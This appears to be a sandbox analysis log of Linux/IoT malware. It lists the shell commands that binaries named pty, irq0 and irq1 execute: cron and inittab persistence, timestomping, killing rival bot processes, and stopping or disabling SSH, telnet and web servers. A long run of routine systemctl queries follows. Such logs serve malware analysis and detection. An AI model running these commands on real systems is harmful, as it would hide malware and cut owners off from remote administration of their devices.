Source: ./pty (PID: 5205)Shell command executed: sh -c "crontab /var/run/.x001804289383"
Source: ./pty (PID: 5226)Shell command executed: sh -c "rm -rf /var/run/.x001804289383"
Source: ./pty (PID: 5233)Shell command executed: sh -c "/bin/uname -n"
Source: ./pty (PID: 5262)Shell command executed: sh -c "/bin/uname -n"
Source: ./pty (PID: 8336)Shell command executed: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & "
Source: ./irq0 (PID: 5317)Shell command executed: sh -c "chmod 700 /tmp/irq0 > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5320)Shell command executed: sh -c "touch -acmr /bin/ls /tmp/irq0"
Source: ./irq0 (PID: 5323)Shell command executed: sh -c "(crontab -l | grep -v \"/tmp/irq0\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
Source: ./irq0 (PID: 5345)Shell command executed: sh -c "echo \"* * * * * /tmp/irq0 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
Source: ./irq0 (PID: 5404)Shell command executed: sh -c "crontab /var/run/.x00740882966"
Source: ./irq0 (PID: 5415)Shell command executed: sh -c "rm -rf /var/run/.x00740882966"
Source: ./irq0 (PID: 5438)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/tmp/irq0\" > /etc/inittab2"
Source: ./irq0 (PID: 5478)Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/irq0\" >> /etc/inittab2"
Source: ./irq0 (PID: 5480)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"
Source: ./irq0 (PID: 5483)Shell command executed: sh -c "rm -rf /etc/inittab2"
Source: ./irq0 (PID: 5489)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"
Source: ./irq0 (PID: 5547)Shell command executed: sh -c "/bin/uname -n"
Source: ./irq0 (PID: 5550)Shell command executed: sh -c "/bin/uname -n"
Source: ./irq0 (PID: 5553)Shell command executed: sh -c "/bin/uname -n"
Source: ./irq0 (PID: 5607)Shell command executed: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5611)Shell command executed: sh -c "service httpd stop > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5615)Shell command executed: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5640)Shell command executed: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5671)Shell command executed: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5678)Shell command executed: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
Source: ./irq0 (PID: 5719)Shell command executed: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
Source: ./irq0 (PID: 5751)Shell command executed: sh -c "killall -9 httpd > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5757)Shell command executed: sh -c "service telnetd stop > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5766)Shell command executed: sh -c "service sshd stop > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5798)Shell command executed: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5844)Shell command executed: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5858)Shell command executed: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5872)Shell command executed: sh -c "killall -9 sshd > /dev/null 2>&1 &"
Source: ./irq0 (PID: 5923)Shell command executed: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
Source: ./irq0 (PID: 8393)Shell command executed: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
Source: ./irq1 (PID: 6069)Shell command executed: sh -c "chmod 700 /tmp/irq1 > /dev/null 2>&1 &"
Source: ./irq1 (PID: 6079)Shell command executed: sh -c "touch -acmr /bin/ls /tmp/irq1"
Source: ./irq1 (PID: 6103)Shell command executed: sh -c "(crontab -l | grep -v \"/tmp/irq1\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
Source: ./irq1 (PID: 6154)Shell command executed: sh -c "echo \"* * * * * /tmp/irq1 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
Source: ./irq1 (PID: 6165)Shell command executed: sh -c "crontab /var/run/.x00740882966"
Source: ./irq1 (PID: 6184)Shell command executed: sh -c "rm -rf /var/run/.x00740882966"
Source: ./irq1 (PID: 6218)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/tmp/irq1\" > /etc/inittab2"
Source: ./irq1 (PID: 6249)Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/irq1\" >> /etc/inittab2"
Source: ./irq1 (PID: 6256)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"
Source: ./irq1 (PID: 6266)Shell command executed: sh -c "rm -rf /etc/inittab2"
Source: ./irq1 (PID: 6271)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"
Source: ./irq1 (PID: 6310)Shell command executed: sh -c "/bin/uname -n"
Source: ./irq1 (PID: 6321)Shell command executed: sh -c "/bin/uname -n"
Source: ./irq1 (PID: 6344)Shell command executed: sh -c "/bin/uname -n"
Source: ./irq1 (PID: 7189)Shell command executed: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7193)Shell command executed: sh -c "service httpd stop > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7197)Shell command executed: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7236)Shell command executed: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7265)Shell command executed: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7303)Shell command executed: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
Source: ./irq1 (PID: 7307)Shell command executed: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
Source: ./irq1 (PID: 7326)Shell command executed: sh -c "killall -9 httpd > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7361)Shell command executed: sh -c "service telnetd stop > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7381)Shell command executed: sh -c "service sshd stop > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7391)Shell command executed: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7435)Shell command executed: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7492)Shell command executed: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7511)Shell command executed: sh -c "killall -9 sshd > /dev/null 2>&1 &"
Source: ./irq1 (PID: 7527)Shell command executed: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
Source: ./irq1 (PID: 8433)Shell command executed: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
Source: /bin/sh (PID: 4603)Chmod executable: /bin/chmod -> chmod +x /var/run/tty0
Source: /bin/sh (PID: 4604)Chmod executable: /bin/chmod -> chmod 700 /var/run/tty0
Source: /bin/sh (PID: 4635)Chmod executable: /bin/chmod -> chmod +x /var/run/tty1
Source: /bin/sh (PID: 4636)Chmod executable: /bin/chmod -> chmod 700 /var/run/tty1
Source: /bin/sh (PID: 4667)Chmod executable: /bin/chmod -> chmod +x /var/run/tty2
Source: /bin/sh (PID: 4668)Chmod executable: /bin/chmod -> chmod 700 /var/run/tty2
Source: /bin/sh (PID: 4699)Chmod executable: /bin/chmod -> chmod +x /var/run/tty3
Source: /bin/sh (PID: 4700)Chmod executable: /bin/chmod -> chmod 700 /var/run/tty3
Source: /bin/sh (PID: 4731)Chmod executable: /bin/chmod -> chmod +x /var/run/tty4
Source: /bin/sh (PID: 4732)Chmod executable: /bin/chmod -> chmod 700 /var/run/tty4
Source: /bin/sh (PID: 4763)Chmod executable: /bin/chmod -> chmod +x /var/run/tty5
Source: /bin/sh (PID: 4764)Chmod executable: /bin/chmod -> chmod 700 /var/run/tty5
Source: /bin/sh (PID: 4795)Chmod executable: /bin/chmod -> chmod +x /var/run/tty6
Source: /bin/sh (PID: 4796)Chmod executable: /bin/chmod -> chmod 700 /var/run/tty6
Source: /bin/sh (PID: 4827)Chmod executable: /bin/chmod -> chmod +x pty
Source: /bin/sh (PID: 4828)Chmod executable: /bin/chmod -> chmod 700 pty
Source: /bin/sh (PID: 5093)Chmod executable: /bin/chmod -> chmod 700 /tmp/pty
Source: /bin/sh (PID: 5280)Chmod executable: /bin/chmod -> chmod +x irq0
Source: /bin/sh (PID: 5281)Chmod executable: /bin/chmod -> chmod 700 irq0
Source: /bin/sh (PID: 5319)Chmod executable: /bin/chmod -> chmod 700 /tmp/irq0
Source: /bin/sh (PID: 5974)Chmod executable: /bin/chmod -> chmod +x irq1
Source: /bin/sh (PID: 5977)Chmod executable: /bin/chmod -> chmod 700 irq1
Source: /bin/sh (PID: 6078)Chmod executable: /bin/chmod -> chmod 700 /tmp/irq1
Source: /bin/sh (PID: 6382)Chmod executable: /bin/chmod -> chmod +x irq2
Source: /bin/sh (PID: 6385)Chmod executable: /bin/chmod -> chmod 700 irq2
Source: /bin/sh (PID: 6699)Chmod executable: /bin/chmod -> chmod +x /var/tmp/pty
Source: /bin/sh (PID: 6705)Chmod executable: /bin/chmod -> chmod 700 /var/tmp/pty
Source: /bin/sh (PID: 7019)Chmod executable: /bin/chmod -> chmod +x /var/run/pty
Source: /bin/sh (PID: 7024)Chmod executable: /bin/chmod -> chmod 700 /var/run/pty
Source: /bin/sh (PID: 5152)Grep executable: /bin/grep -> grep -v /tmp/pty
Source: /bin/sh (PID: 5154)Grep executable: /bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 5156)Grep executable: /bin/grep -> grep -v lesshts/run.sh
Source: /bin/sh (PID: 5327)Grep executable: /bin/grep -> grep -v /tmp/irq0
Source: /bin/sh (PID: 5328)Grep executable: /bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 5329)Grep executable: /bin/grep -> grep -v lesshts/run.sh
Source: /bin/sh (PID: 5441)Grep executable: /bin/grep -> grep -v /tmp/irq0
Source: /bin/sh (PID: 6119)Grep executable: /bin/grep -> grep -v /tmp/irq1
Source: /bin/sh (PID: 6120)Grep executable: /bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 6121)Grep executable: /bin/grep -> grep -v lesshts/run.sh
Source: /bin/sh (PID: 6231)Grep executable: /bin/grep -> grep -v /tmp/irq1
Source: /bin/sh (PID: 4833)Rm executable: /bin/rm -> rm -rf /var/run/wgsh
Source: /bin/sh (PID: 4883)Rm executable: /bin/rm -> rm -rf /var/run/bbsh
Source: /bin/sh (PID: 4901)Rm executable: /bin/rm -> rm -rf /var/run/pty
Source: /bin/sh (PID: 5078)Rm executable: /bin/rm -> rm -rf /tmp/.xs/*
Source: /bin/sh (PID: 5227)Rm executable: /bin/rm -> rm -rf /var/run/.x001804289383
Source: /bin/sh (PID: 5437)Rm executable: /bin/rm -> rm -rf /var/run/.x00740882966
Source: /bin/sh (PID: 5485)Rm executable: /bin/rm -> rm -rf /etc/inittab2
Source: /bin/sh (PID: 8395)Rm executable: /bin/rm -> rm -rf /var/run/tty0 /var/run/tty1 /var/run/tty2 /var/run/tty3 /var/run/tty4 /var/run/tty5 /var/run/tty6 /tmp/tt*
Source: /bin/sh (PID: 6212)Rm executable: /bin/rm -> rm -rf /var/run/.x00740882966
Source: /bin/sh (PID: 6268)Rm executable: /bin/rm -> rm -rf /etc/inittab2
Source: /bin/sh (PID: 8435)Rm executable: /bin/rm -> rm -rf /var/run/tt* /tmp/tt*
Source: /bin/sh (PID: 7032)Rm executable: /bin/rm -> rm -rf /var/run/1sh
Source: /usr/sbin/service (PID: 5613)Systemctl executable: /bin/systemctl -> systemctl stop httpd.service
Source: /usr/sbin/service (PID: 5692)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 5754)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 6015)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 6060)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 6185)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 6381)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 6453)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 6478)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 6506)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 6535)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 6567)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 6581)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 6605)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 6628)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 6659)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 6691)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 6750)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 6777)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 6812)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 6848)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 6870)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 6903)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 6929)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 6961)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 6975)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 7010)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Source: /usr/sbin/service (PID: 5763)Systemctl executable: /bin/systemctl -> systemctl stop telnetd.service
Source: /usr/sbin/service (PID: 5854)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 6018)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 6186)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 6379)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 6451)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 6479)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 6505)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 6545)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 6571)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 6603)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 6607)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 6657)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 6662)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 6748)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 6776)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 6811)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 6825)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 6849)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 6891)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 6908)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 6930)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 6973)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 6980)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 7011)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 7077)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 7123)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Source: /usr/sbin/service (PID: 5795)Systemctl executable: /bin/systemctl -> systemctl stop sshd.service
Source: /usr/sbin/service (PID: 5860)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 6016)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 6375)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 6450)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 6477)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 6504)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 6511)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 6549)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 6577)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 6604)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 6612)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 6658)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 6661)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 6749)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 6775)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 6788)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 6820)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 6847)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 6851)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 6897)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 6928)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 6955)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 6974)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 7009)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 7057)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 7082)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Source: /usr/sbin/service (PID: 7195)Systemctl executable: /bin/systemctl -> systemctl stop httpd.service
Source: /usr/sbin/service (PID: 7268)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 7311)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 7558)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 7599)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 7615)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 7634)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 7669)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 7696)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 7722)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 7730)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 7776)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 7792)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 7820)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 7841)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 7881)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 7895)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 7938)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 7951)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 7976)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 8011)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 8038)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 8073)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 8092)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 8119)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 8136)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 8173)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Source: /usr/sbin/service (PID: 7380)Systemctl executable: /bin/systemctl -> systemctl stop telnetd.service
Source: /usr/sbin/service (PID: 7414)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 7564)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 7632)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 7635)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 7670)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 7697)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 7724)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 7764)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 7785)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 7813)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 7840)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 7865)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 7894)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 7903)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 7940)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 7975)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 8010)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 8037)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 8061)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 8091)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 8118)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 8127)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 8172)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 8175)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 8245)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 8263)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Source: /usr/sbin/service (PID: 7385)Systemctl executable: /bin/systemctl -> systemctl stop sshd.service
Source: /usr/sbin/service (PID: 7465)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 7562)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 7614)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 7633)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 7668)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 7695)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 7723)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 7757)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 7777)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 7812)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 7839)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 7847)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
